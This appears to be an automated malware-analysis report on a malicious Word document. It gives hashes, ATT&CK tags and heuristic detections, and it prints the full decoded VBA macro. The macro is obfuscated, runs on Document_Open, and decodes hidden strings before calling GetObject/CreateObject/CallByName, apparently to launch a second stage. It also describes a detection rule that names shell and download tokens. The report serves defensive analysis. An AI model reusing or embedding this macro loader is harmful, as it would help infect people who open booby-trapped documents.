Office (OOXML) / .DOC malware analysis — malicious · 77f7c3a085304de7

MALICIOUS

Office (OOXML) / .DOC

19.6 KB Created: 2023-06-10 13:45:55 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2023-06-13

MD5: 95c6b60573e0b416b3adc1b035a2048c SHA-1: 142a5ab24521d84e09804e0af0811db5394e4df5 SHA-256: 77f7c3a085304de765eede3f7f08a7f4bc9f52f27a271cd7470c2e13e2f9e24f

190 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is an OOXML document containing VBA macros, including a Document_Open macro, which is a common technique for initial execution. The heuristics indicate the use of CreateObject, GetObject, and CallByName, suggesting dynamic code execution. The VBA script itself appears to be obfuscated, but its structure implies it is designed to extract and execute further code, likely a second-stage payload.

Heuristics 7

VBA project inside OOXML medium 5 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set Montreal = GetObject(Witness).CreateObject(Cherry)
```
GetObject call high OLE_VBA_GETOBJ

GetObject call
Matched line in script
```
Set Montreal = GetObject(Witness).CreateObject(Cherry)
```
CallByName call high OLE_VBA_CALLBYNAME

CallByName call
Matched line in script
```
CallByName Montreal, Towns, VbMethod, CyCling, 0
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.

Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro

Matched line in script

                                                        Sub Document_Open()

Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL https://ols.[OSI.BaseHost]/ThisDocument In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/2019/extlstIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahashIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
- https://skyapi.live.net/Activity/{0In document text (OOXML body / shared strings)
- https://api.onedrive.comIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	4537 bytes
SHA-256: `128700b23d9cd4933b609632004dffdede00400259dfb92dc9a4f8c4927bee51`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Option Explicit Private Witness As String Private Cherry As String Private Towns As String Private Function Happening(ByVal Wright As String) As Variant Dim Fortune As Long: Fortune = 0: Dim MiniMal() As Byte: Dim Clerk() As Byte, Modification As String, Mandatory As Integer Clerk = "u68d65b681" GoTo Extract NissaN: Dim Receives As String Receives = InputBox("temper cool") Lanka: If Fortune < UBound(MiniMal) Then Mandatory = Fortune Mod (10) GoTo AllocAtion Latex: Modification = Modification & Chr(MiniMal(Fortune)) Fortune = Fortune + 1 GoTo Lanka Else GoTo TransmiTTed End If Tricks: Dim Carpet As String Carpet = InputBox("setem ponutn") TransmiTTed: Happening = Modification Exit Function Extract: MiniMal = Guilty(Wright) GoTo Lanka AllocAtion: MiniMal(Fortune) = Abs(MiniMal(Fortune) Xor Clerk(Mandatory * 2)) GoTo Latex End Function Private Sub Distinct() Dim Montreal As Object Dim CyCling As String GoTo Latex TransformaTion: Towns = Happening(Towns) Infant Montreal, CyCling Exit Sub Formerly: Witness = Happening(Witness) CyCling = Happening(CyCling) Cherry = Happening(Cherry) Set Montreal = GetObject(Witness).CreateObject(Cherry) GoTo TransformaTion Dim Modification As String Modification = InputBox("pass") MsgBox Modification Witness = Modification Latex: Witness = ActiveDocument.Variables("u48ad").Value: CyCling = ActiveDocument.Variables("y2e45").Value: Cherry = ActiveDocument.Variables("ra1cd").Value: Towns = ActiveDocument.Variables("l1f9").Value GoTo Formerly End Sub Sub Infant(ByVal Montreal As Object, ByVal CyCling As String) CallByName Montreal, Towns, VbMethod, CyCling, 0 End Sub Sub Document_Open() GoTo Rocks Dim Carpet As String Carpet = InputBox("Put err code") Dim Receives As String Receives = InputBox("Optimisrt") MsgBox Receives Rocks: If Carpet = "" Then Distinct End If End Sub Private Function Guilty(ByVal Tricks As String) As Variant Dim Modification() As Byte, i As Long, Mandatory As Integer, Rocks As Integer Rocks = Len(Tricks) / 2: i = 0: ReDim Modification(0 To Rocks) As Byte Carpet: If i < Len(Tricks) Then Mandatory = Mandatory + 1 Modification(Mandatory - 1) = Chr(14 + (12 * 2)) & Chr((16 + (4 * 5)) * 2) & Mid(Tricks, i + 1, 2) i = i + 2 GoTo Carpet Else GoTo Receives Dim AllocAtion As String AllocAtion = InputBox("Autoscale calculation") End If Receives: Guilty = Modification End Function
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	16384 bytes
SHA-256: `e2d5cb7d307814ca60e9fe34479c1ee6151bf02456d7f8c8a8694b1bafa18e9f`

Open this report in the interactive analyzer, or submit your own file for analysis.